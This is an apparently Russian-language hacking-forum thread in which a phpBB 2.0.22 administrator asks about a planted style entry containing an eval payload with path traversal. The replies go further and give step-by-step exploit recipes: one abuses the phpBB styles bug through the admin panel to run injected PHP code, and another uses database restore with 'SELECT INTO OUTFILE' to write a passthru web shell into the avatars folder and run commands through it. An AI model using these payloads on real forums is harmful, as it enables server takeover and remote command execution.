Стоит пхпбб 2.0.22. Щас в стилях обнаружил мною не до конца удаленный стиль, но уже кем то обработанный:

Style: FI
Template: aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp

Что это, попытка или уже состовшийся взлом? Я думаю попытка ибо этот код вроде нигде не будет выполняться. Было ли это сделано через акк админа или тут поработали SQL иньекциями? Всем спасибо за версии.

Ещё раз в потверждении моей версии, что код выполняться не будет.

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

Phpbb работает с этой строчкой не более как с именем файла. Но по прежнему интересует каким образом это значение забито, через ак админа вроде так не сделаешь, значит добрались до базы?

Попытка...попробуй выставить этот стиль и изменить немного адрес, добавив ?nigga=phpinfo();

Проверил на всякий - но ничего, тоже самое. Через ак админа такую тему реально было замутить? Я просто догадываюсь кто меня ломает, там ломаки сидят - максимум пароль админа сбрутят. Но через админку template_сonfig_file вроде ни как не изменишь?? Да и про SQL иньекции в админке я так же не слышал. Поэтому не могу понять как это злоумышленнику удалось?!

в админке можно выполнить любые скл запросы посредством "восстановление бд"

создаешь файлик 1.sql и пишешь в нем любые запросы, потом грузишь и они выполнились

внимательнее читай прикрепленный топ про пхпбб


2) Через стили. (Нужны админские права).
Суть баги читайте в инете, было выложено.
как юзать:
Идем в админскую панель, жмакаем ссылку в Стилях "Создать". Правим правый фрейм.(Я предпочитаю править прям в опере, жмем исходный код, правим страницу, и жмем обновить из кеша.) style_name делаем произвольным. А template_name удаляем дефолтный(subSilver) и вставляем свой
Код:

a=12;eval($_REQUEST[kiborg]);exit(0);//../../../../../../../tmp/

Мы создали стиль, теперь надо его экспортировать в форум. Жмем ссылку "Экспорт", там будет тока текущий стиль, правим сурс, меняем его на
Код:

a=12;eval($_REQUEST[kiborg]);exit(0);//../../../../../../../tmp/

В папке /tmp/ появиться файл theme_info.cfg.
Заходя по ссылке
http://localhost/phpbb13/admin/admin_styles.php?mode=addnew&sid=(тут_ваша_сессия)&&install_to=../../../../../../../tmp/&kiborg=phpinfo();
нам покажеться phpinfo();

Exploit: http://milw0rm.com/exploits/1247

Спасибо. Вот что выдал форум

Warning: main(./../templates/tmp/theme_info.cfg): failed to open stream: No such file or directory in ---- on line 78

Warning: main(): Failed opening './../templates/tmp/theme_info.cfg' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in ---- on line 78

Я так понимаю на 2.0.22 бага не актуальна?

1. Идём в админку и делаем полную копию базы данных .
2. Теперь нам нужно узнать установочную директорию форума
смотри тут https://forum.antichat.ru/threadnav24488-1-10.html
а теперь правим базу находим такую строку:

INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');

INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
SELECT cat_title INTO OUTFILE '/тут_твой_путь_до_форума/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;
UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1;

восстанавливаем базу

http://site.com/phpBB/images/avatars/shell.php?cmd=ls - тут твой шелл